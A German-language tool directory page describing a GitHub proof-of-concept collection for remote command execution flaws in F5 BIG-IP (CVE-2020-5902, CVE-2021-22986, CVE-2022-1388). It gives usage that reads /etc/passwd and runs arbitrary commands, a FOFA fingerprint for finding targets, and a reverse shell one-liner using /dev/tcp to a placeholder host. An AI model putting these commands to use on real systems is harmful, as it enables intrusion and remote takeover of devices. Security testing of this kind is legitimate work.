Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
F5-BIG-IP-POC — CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC-Sammlung | Kitploit
Tools/GitHubGitHub/west9b/f5-big-ip-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubwest9b/f5-big-ip-poc

F5-BIG-IP-POC

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC-Sammlung

Repository anzeigen
102vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

F5-BIG-IP POC

In Go geschriebene POC-Sammlung für CVE-2020-5902, CVE-2021-22986 und CVE-2022-1388; weitere F5-POCs werden später hinzugefügt.

author:160team.west9B

Nur für autorisierte Sicherheitsforscher. Dabei ist das Netzwerksicherheitsgesetz zu beachten. Für etwaige Probleme wird keine Haftung übernommen; sie liegen nicht in der Verantwortung des Autors.

01-Grundlegende Einführung

F5-POC-Sammlung:

  • CVE-2020-5902: F5 BIG-IP Remote-Codeausführung-Schwachstelle
  • CVE-2021-22986: F5 BIG-IP iControl REST – nicht autorisierte Remote-Befehlsausführung
  • CVE-2022-1388: Umgehung der Authentifizierung zur Remote-Befehlsausführung

02-Verwendung

Verwendung: ./F5-BIG-IP -u url

CVE-2020-5902 wird durch beliebigen Dateidownload verifiziert; wird /etc/passwd zurückgegeben, ist die Schwachstelle vorhanden.

Bei den POCs für CVE-2021-22986 und CVE-2022-1388 wird standardmäßig der Befehl id ausgeführt. Wird {id} zurückgegeben, ist die Schwachstelle vorhanden. Über -c kann ein eigener Befehl angegeben werden.

Reverse Shell

Verwendung: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

Screenshots

Image text Image text

fofa

icon_hash="-335242539"

Tool herunterladen